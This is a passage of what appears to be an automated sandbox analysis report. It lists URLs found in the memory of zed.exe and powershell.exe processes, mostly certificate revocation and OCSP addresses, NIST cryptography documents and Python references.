Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyusering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: zed.exe, 00000007.00000002.4730450635.0000019AE168E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3016784415.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024919479.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: zed.exe, 0000000C.00000003.3089378618.00000132F886F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084201791.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082961123.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: zed.exe, 0000000C.00000003.3084201791.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F895D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F88DD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082961123.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F8910000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577916/
Source: zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlO
Source: powershell.exe, 0000000A.00000002.3075122060.000002B03D2E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlW
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3016784415.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024919479.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: zed.exe, 00000007.00000003.3023656011.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4744481462.00000132F9EA8000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4744481462.00000132F9F34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F8910000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar.tar.gz
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar.tgz
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4744481462.00000132F9F34000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-4.pdf
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.ests:
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 